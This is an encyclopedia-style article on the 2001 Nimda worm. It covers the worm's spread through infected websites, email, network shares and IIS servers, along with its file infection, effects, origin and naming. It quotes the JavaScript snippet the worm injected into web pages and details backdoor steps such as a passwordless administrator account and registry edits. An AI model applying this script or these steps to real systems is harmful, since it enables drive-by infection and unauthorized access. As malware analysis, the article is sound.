Nimda
Nimda
Type Multi-vector worm
Creator
Date Discovered 2001.09.18
Place of Origin China
Source Language C++
Platform MS Windows
File Type(s) .exe
Infection Length
Reported Costs $2.6 billion

It's an awfully insidious little bastard. You clean it off of one segment of the network and have to make sure it doesn't come back. It's almost like fighting a fire. - Mike Scher, Neohapsis

Nimda is one of the first worms capable of running itself without the user even opening the email (the actual first was Bubbleboy). It is also the first to modify sites to offer copies of itself for download. It also has a viral component that infects executable files.

Behavior

Transmission

The Nimda worm has five different methods of transferring itself to different computers and networks. It also has the ability to infect files.

Infected Website

Nimda can arrive on a computer from visiting an infected website. An infected website will contain the following JavaScript code that causes the browser to download the README.EML file containing the worm:

<script language="JavaScript">
window.open("readme.eml", null, "resizable+ no,top6000,left=6000")
</script>

The README.EML file will open in a minimized window if the user uses Explorer 5.5 with Service Pack 1 or earlier. It may not be able to infect Windows NT and 2000 in this way.

Email

Nimda.png

The worm may also come from an email attachment named README.EXE. The subject and message body are usually empty, though the subject may sometimes be random. The message has two sections, one has the MIME type text/html, which is blank, and the other has the type audio/x-wav. The audio/x-wav section is actually a binary executable, the README.EXE attachment. It may be able to run itself from the preview pane with no intervention from the user, as the worm exploits a vulnerability that exists in Explorer 5.5 with Service Pack 1 or earlier when Explorer is used to render html mail.

Local Network

If the user's computer is on a local network where another computer has been infected with the worm, it will arrive as RICHED20.DLL in any folder with a .doc or .eml file. These files will be hidden.

Server

The worm may also be transmitted from one computer to one running a Microsoft IIS 4.0 / 5.0 server either by a exploiting a directory traversal vulnerability in the server or by using backdoors left by CodeRed.II. It arrives a TFTP#### and is be copied to the server's "scripts" directory as "ADMIN.DLL".

File Infection

In a manner similar to a virus, it can also infect files. Its file infection method is unique, as it does not place itself inside of the file it infects. Instead, the worm copies itself as the name of the executable it is infecting and "assimilates" the original into itself as a resource. When the user executes this program, the worm runs first, then the program the user intended to run is extracted and run.

Nimda can infect files over networks. Because of its file infection ability, it is possible to transmit the worm by moving a stand-alone executable program through a floppy or flash disk. In most cases it avoids infecting the WINZIP32.EXE file. It will not infect files when run from a file other than ADMIN.DLL.

Infection

The worm will behave in certain ways depending on where it is executed and what commands are used. It can also infect files on the computer and over the network it is executed on.

From ADMIN.DLL

When Nimda is executed on a webserver as the file ADMIN.DLL, it copies itself to the windows folder as MMC.EXE. MMC.EXE, before Nimda infection, is a legitimate file, the main executable of the Microsoft Management Console, but it is usually either infected or completely overwritten. The MMC.EXE file is executed with the command line argument "-qusery9bnow". It creates a mutex named "fsdhqherwqi2001".

The worm scans for .exe files on available drives, and infects them. Nimda reads the Local machine App Paths registry key and infects all files listed in that key. In addition, it will read the Local machine Shell Folders key and attempts to infect all files in the folders listed in this key.

From README.EXE

If Nimda starts from the file README.EXE or any file with more than 5 characters in its name with a .exe extension, it copies itself to a temporary folder with a mostly random name beginning with MEP or MA and ending with .TMP, sometimes with .exe as the final extension. The file will be run with a "-dontrunold" command line argument.

Nimda loads itself as a .dll file, looks for a specific resource there and checks its size. If the resource size is less than 100 the worm unloads itself. If the resource size is 100 or greater, the worm extracts the resource file and runs it. Checking the resource size is done to be able to detect if a worm runs from infected EXE files.

The worm checks the system clock and generates a random number. After crunching the numbers a few times, it checks the result, which will be between 1 and 100. If the result is larger than 80, it will delete any file in the temporary folder that begins with README and ends with .EXE.

The worm extracts its MIME message to a temporary folder under a random filename.

Nimda assigns its process as a thread of the EXPLORER process, although this may not work on some systems. This will keep the worm running even when a different user is logged onto the machine. It creates a mutex named "fsdhqherwqi2001". The worm starts Winsock services and gets information on its host, then sleeps for some time.

When Nimda restarts itself, it checks what version of Windows it is running on. If it is on Windows NT, or any version based on that system, it compacts its memory blocks to occupy less space and copies itself as LOAD.EXE and RICHED20.DLL to the system folder. It modifies the file SYSTEM.INI file, adding the string explorer.exe load.exe -dontrunold. This will cause LOAD.EXE to run when the computer starts. The worm looks for shared network resources and scans files on remote systems.

From Any Filename

The worm places .eml and .nws files with copies of itself in nearly all folders it accesses, usually named README, but sometimes also DESKTOP. It will use a .eml extension approximately 95% of the time. It places a hidden file named RICHED20.DLL in all folders where it finds .doc or .eml files. It also tries to replace the legitimate RICHED20.DLL (this file is a shared library for rich text editing used by Microsoft Word and Outlook) with its own copy. This ensures that Nimda will be run when a .doc or .eml file is opened. It will also copy itself to the drives C, D and E (at the root of the drives, not in any folder).

The worm creates an account named "guest" and adds it to the administrator group with administrative privileges. This account requires no password. It turns any drive from C to Z into open network shares by adding the values C$ through Z$ to the LanMan registry key. It also disables sharing security by deleting all subkeys from the Shares Security registry key. The worm disables the proxy by modifying two different versions of the ProxyEnable registry key (one under current user and the other under current config) with the value "0" as well as one of the MigrateProxy key with the value "1".

Spreading

The worm searches the Temporary Internet Files folder for .htm and .html files and scans them for email addresses. It also collects email addresses from emails it finds in the address book and inbox. The worm may send itself with a blank or random Subject line. If it chooses to use a subject line, it will choose one from a text string in a file listed under the current user's personal shell folders registry key. It sends itself using its own SMTP engine.

The worm scans IP addresses for IIS servers that have backdoors left by CodeRed.II. There is a 25% possibility that the IP address it chooses will be completely random. There is also a 25% possibility that the first octet of the address will be the same as that of the current computer, and the rest will be random. There is a 50% possibility that the first two octets of the address will be the same as that of the current computer. When it finds one, it sends a copy of itself via TFTP as TFTP # . This file name is changed to ADMIN.DLL and it executes this copy on the new machine.

On servers, Nimda searches for .htm, .html and .asp webpage files on local hard drives, then creates and places the file README.EML in the directories where such files are found. README.EML is an email file containing a MIME-encoded copy of the worm. The worm adds the three lines of JavaScript code that will cause the browser of a computer reading the webpage to open the README.EML file.

The worm creates around 200 threads, which search for network shares. It copies RICHED20.DLL to any folder on the network with a .doc or .eml file.

Effects

The original version of Nimda infected nearly 160,000 systems, according to data from the Cooperative Association of Internet Data Analysis. Many companies pulled their networks from the Internet to avoid being infected with the worm. The worm affected many IT-related websites, including some belonging to Dell, Microsoft and even one security firm, Alternative Computer Technology.

The E variant crippled the federal court computer system in Miami, Florida, where it hit the courts' systems on Halloween. Court workers could access only the paper versions of thousands of case records. The electronic files themselves were not destroyed, but the systems they were on had to be cleaned one by one. This variant also shut down the systems of the New York Times on October 30 and half of the next day.

Origin

This worm was found on 2001.09.18. It quickly spread around the world. The first version of Nimda, released Sept. 18, had a copyright notice that said "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China." It is not yet absolutely certain whether the worm originated in China, as the credit seems to indicate, but some do say the first scans they received came from Asian networks. When Nimda was first noticed, Korea was also considered a possibility for the origin of the worm. Korea was also where the variant Nimda.E was first reported.

Name

The creator obviously intended the worm to be named "Concept", but this name was already taken by a macro virus. As the worm creates an account with administrator privileges, and it places a file named "Admin" on computers it infects, antivirus researchers turned Admin backwards and named it "Nimda". In Nimda.E, the creator seems to express some dissatisfaction with the name the Antivirus companies gave his creation, as it contains the text string "(This's CV, No Nimda.)" after its "copyright".

Antivirus Aliases

  • Avast!: Win32:Nimda
  • Avira: W32/Nimda.eml
  • BitDefender: Win32.Nimda.A@mm
  • ClamAV: W32.Nimda.eml
  • Eset: Win32/Nimda.A
  • Grisoft: I-Worm/Nimda
  • Kaspersky: Net-Worm.Win32.Nimda or I-Worm.Nimda
  • McAfee: Exploit-MIME.gen.ex
  • Sophos: W32/Nimda-A
  • Symantec: W32.Nimda.A@mm

Other Facts

Mike Scher, senior research consultant with network security company Neohapsis, described the worm as an "awfully insidious little bastard" and trying to remove it as "almost like fighting a fire".

Because of the time that the worm appeared, some have suspected that the worm may have been connected to the recent terrorist attacks.

The worm also inspired a song.

Sources

Andrew Mackie, Jensenne Roculan, Ryan Russell, Mario Van Velzen. Attack Registry & Intelligence Service, Nimda Worm Analysis. 2001.09.21 (PDF)

SANS Institute, NIMDA Worm/Virus Report-- Interim. 2001.09.27

K. Tocheva, G. Erdelyi, A. Podrezov, S. Rautiainen and M. Hypponen. F-Secure Antivirus, F-Secure Virus Descriptions : Nimda 2001.09.18-19

CERT, Nimda. 2001.09.18-25

Computer Incident Advisory Capability, US Department of Energy, L-144b: The W32.nimda Worm. 2001.09.18

Kaspersky Labs. SecureList.com, Net-Worm.Win32.Nimda. 2001.09.20

Constin Ionescu. BitDefender Antivirus, Win32.Nimda.A@mm

Eric Chien. Symantec.com, W32.Nimda.A@mm

Trend Micro Antivirus, PE_NIMDA.A. 2001.09.18

Alan Luber. Capitalism Magazine, Is your Computer Protected from Terrorists?. 2001.09.24

Rober Lemos. CNet News, New studies reveal Nimda's tenacity. 2001.09.21

John Leyden. The Register, Teenage Mutant Nimda email rides the Code Red worm. 2001.09.18

-. -, Nimda worm runs riot on IT sites. 2001.09.20

Kieren McCarthy. -, Security firm caught out by Nimda. 2001.09.20

Robert Lemos. ZDnet News, Son of Nimda on the attack. 2001.10.31

Preeti Vasishta. Government Computer News, Nimda worm hits court computers. 2001.11.09

John Schwartz. The New York Times, Computers Hit Around Globe By New Form Of Old Virus. 2001.11.01

Alex Ma. CAIDA, Dynamic Graphs of the Nimda worm.

Mark Rasch, SecurityFocus. The Register, "US corporate security disclosure plan won't help". 2003.10.20

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-NonCommercial-ShareAlike 3.0 License